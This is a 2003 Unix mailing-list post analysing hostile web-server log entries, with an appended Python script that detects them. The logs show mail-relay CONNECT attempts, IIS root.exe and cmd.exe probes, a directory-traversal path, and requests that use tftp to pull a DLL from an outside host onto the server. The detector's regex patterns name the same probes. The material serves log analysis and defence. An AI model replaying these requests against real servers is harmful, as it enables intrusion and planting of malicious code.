[H-GEN] weird web server logs

Stuart Longland stuartl at longlandclan.hopto.org
Sun Feb 23 05:29:03 EST 2003


[ Humbug *General* list - semi-serious discussions about Humbug and     ]
[ Unix-related topics. Posts from non-subscribed addresses will vanish. ]


Tony Nugent wrote:
| First exploit
| -------------
|
| Essentially this is a spammer open relay attempt, used like this to
| hide its true origin.
|
|   (I've seen this sort of exploit used with web proxy servers that
|   have poor ACLs to prevent CONNECT from unauthorised sources... in
|   this case the target server happens to be smtp-gw-4.msn.com).
|
| It's interesting to see this attempt to use the web server as a
| proxy...  perhaps this exploit is looking for proxy servers
| listening on port 80?  Or is CONNECT a valid http method?
|
	Haven't had too many of these, but we've had people try to use GET
methods for a similar purpose, our hit counter gets them every time.
I've had several trying to exploit one of Micro$loth's mail servers, a
couple exploiting an FTP server, and a few exploiting some other sites.
Every time, they get our website, and trigger our hit counter, nice eh. ;-)

Actually, just looking at my logs now, what do you make of these: (I've
tabbed them out for readability)

customer79-153.iplannetworks.net - -
	[23/Feb/2003:13:13:35 +1000]
	"CONNECT maila.microsoft.com:25 HTTP/1.0"
	405 315 "-" "-"

hse-ottawa-ppp162535.sympatico.ca - -
	[23/Feb/2003:15:27:42 +1000]
	"CONNECT maila.microsoft.com:25 / HTTP/1.0"
	405 315 "-"
	"Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"

202.103.38.170 - -
	[23/Feb/2003:11:05:09 +1000]
	"GET /scripts/root.exe?/c+dir
	HTTP/1.0" 200 1827 "-" "-"

202.103.38.170 - -
	[23/Feb/2003:11:05:15 +1000]
	"GET
/scripts/root.exe?/c+tftp%20-i%20202.114.40.182%20GET%20cool.dll%20httpodbc.dll
HTTP/1.0"
	200 1882 "-" "-"

202.103.38.170 - -
	[23/Feb/2003:11:05:17 +1000]
	"GET /scripts/httpodbc.dll HTTP/1.0" 200 1824 "-" "-"

This command is common:
202.103.38.170 - -
	[23/Feb/2003:11:05:19 +1000]
	"GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 1825 "-" "-"


202.103.38.170 - -
	[23/Feb/2003:11:05:22 +1000]
	"GET
/MSADC/root.exe?/c+tftp%20-i%20202.114.40.182%20GET%20cool.dll%20httpodbc.dll
HTTP/1.0"
	200 1880 "-" "-"

202.103.38.170 - -
	[23/Feb/2003:11:05:24 +1000]
	"GET /MSADC/httpodbc.dll HTTP/1.0"
	200 1822 "-" "-"

202.103.38.170 - -
	[23/Feb/2003:11:05:27 +1000]
	"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
	301 350 "-" "-"

	It makes me wonder if I should confuse their hacking utility by making
a smart-arsed CGI script called cmd.exe...  They'll try just about every
conceivable combination which makes me wonder if this is a utility doing
this, not a raw telnet terminal.  The lack of an HTTP User Agent here
seems to support this theory.

| Second exploit
| --------------
|
| This is an obvious "root-access" attempt to exploit problems with
| vulnerable versions of m$-IIS.
|
| The full first and last log of an event is recorded here to
| illustrate the total time (10 seconds).  Below that is a summary of
| the "file not found" errors.  This can happen several times/day,
| from different IPs, and like this one the src IP does not resolve.
|
| ==> /var/log/httpd/error_log <==
| [Mon Feb 17 05:35:55 2003] [error] [client 203.250.76.140]
|   File does not exist: /var/www/html/scripts/root.exe
| ...
| [Mon Feb 17 05:36:05 2003] [error] [client 203.250.76.140]
|   File does not exist:
/var/www/html/scripts/..%2f../winnt/system32/cmd.exe
|
| I'd really like to have the web server outright refuse to respond to
| these sorts of queries... is it possible to get apache to automatically
| block (or ignore) IPs that do this - especially not to respond with
| any error message (ie, ignore the request)?
|
| Cheers
| Tony

	Yes, we've actually had someone in Thailand attempt over 300 times
along with hundreds of others (much to my amusement), to get into our
server, without success.  As far as blocking this sort of thing, I did
manage to make a perl script which watches the apache logs and uses the
iptables command under Linux to block people after 5 attempts.

	However, in the case of 'the Thai Crusader' (as one of my mates dubbed
this individual - hacking from the Communications Authority of Thailand)
this wasn't much of a deterrent, I still had this person from this one
particular IP, attacking, 5 attempts per hour (my script blocks hackers
for an hour and forgets after a day).

We've also had people hacking from Korea, China, India, Indonesia, the
Caribbean, and the US - but mostly in Asia.

I'm running Apache 2.0.40 under RedHat Linux 8.0 -
http://longlandclan.hopto.org/

	I'll have to iron out some of these scripts because they're actually
designed for Apache 1.3 (I first made them on our Slackware 8.0 box
running Apache 1.3.26) and make them more user friendly but if the
interest is out there, I can publish them.

	I've also got a PHP script which works as an error 404/400 page and
will do a whois lookup on the IP and send me an email with all the
details.  Again, this will have to be cleaned up, but should work on any
Unix system (although it's designed for Linux).  RedHat actually
partially broke this script because their version of whois requests the
info from the wrong server, and as a result, it obtains nothing, (any
ideas on how I can specify a list of servers to query?) but everything
else works.

--
+-------------------------------------------------------------+
| Stuart Longland           stuartl at longlandclan.hopto.org |
| Brisbane Mesh Node: 719             http://stuartl.cjb.net/ |
| I haven't lost my mind - it's backed up on a tape somewhere |
+-------------------------------------------------------------+
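As an added example (not the poster's Perl script and not from the list), a Python sketch of the detection logic this message describes: it parses Apache combined-format lines, matches the request signatures visible in the excerpts above (CONNECT to port 25, root.exe/cmd.exe/httpodbc.dll, the ..%2f.. traversal from the error_log) and returns hosts that reach five hits within an hour, leaving the iptables action to the caller. The sample lines are constructed, reflowed from the tabbed entries above, and the 200 responses there are the hit-counter page, so status codes are deliberately not used as a signal.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Apache combined format as in the entries above: host ident user [ts] "request" status ...
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')
# Request signatures taken from this thread: CONNECT to a mail port (open-relay abuse),
# the root.exe/cmd.exe/httpodbc.dll IIS probes, and the ..%2f.. form from the error_log.
SIGNATURES = [
    ("connect-relay", re.compile(r'^CONNECT \S+:25\b')),
    ("iis-probe", re.compile(r'/(root\.exe|cmd\.exe|httpodbc\.dll)(\?|\s|$)', re.I)),
    ("traversal", re.compile(r'(\.\./|%2f\.\.|\.\.%2f)', re.I)),
]
def classify(request):
    """Name the first matching signature, or None for an ordinary request."""
    return next((name for name, rx in SIGNATURES if rx.search(request)), None)
def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None  # not a combined-format line: skip it rather than crash
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("host"), ts, m.group("req")
def offenders(lines, threshold=5, window=timedelta(hours=1)):
    """Hosts with >= threshold suspicious hits inside one sliding window (the post's rule: 5, then block)."""
    hits = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed and classify(parsed[2]):
            hits[parsed[0]].append(parsed[1])
    flagged = {}
    for host, times in hits.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1  # drop hits that fell out of the window
            if end - start + 1 >= threshold:
                flagged[host] = len(times)  # total hits seen; caller decides the action
                break
    return flagged
# Constructed sample: the tabbed entries above reflowed to one line each, plus a benign hit.
SAMPLE = """\
customer79-153.iplannetworks.net - - [23/Feb/2003:13:13:35 +1000] "CONNECT maila.microsoft.com:25 HTTP/1.0" 405 315 "-" "-"
202.103.38.170 - - [23/Feb/2003:11:05:09 +1000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 1827 "-" "-"
202.103.38.170 - - [23/Feb/2003:11:05:15 +1000] "GET /scripts/root.exe?/c+tftp%20-i%20202.114.40.182%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 1882 "-" "-"
202.103.38.170 - - [23/Feb/2003:11:05:17 +1000] "GET /scripts/httpodbc.dll HTTP/1.0" 200 1824 "-" "-"
202.103.38.170 - - [23/Feb/2003:11:05:19 +1000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 1825 "-" "-"
202.103.38.170 - - [23/Feb/2003:11:05:27 +1000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 301 350 "-" "-"
192.0.2.10 - - [23/Feb/2003:11:06:00 +1000] "GET /index.html HTTP/1.0" 200 512 "-" "Mozilla/4.0"
""".splitlines()
```

Running `offenders(SAMPLE)` on the sample flags 202.103.38.170 (five probes in 18 seconds) and leaves the single CONNECT attempt below the threshold.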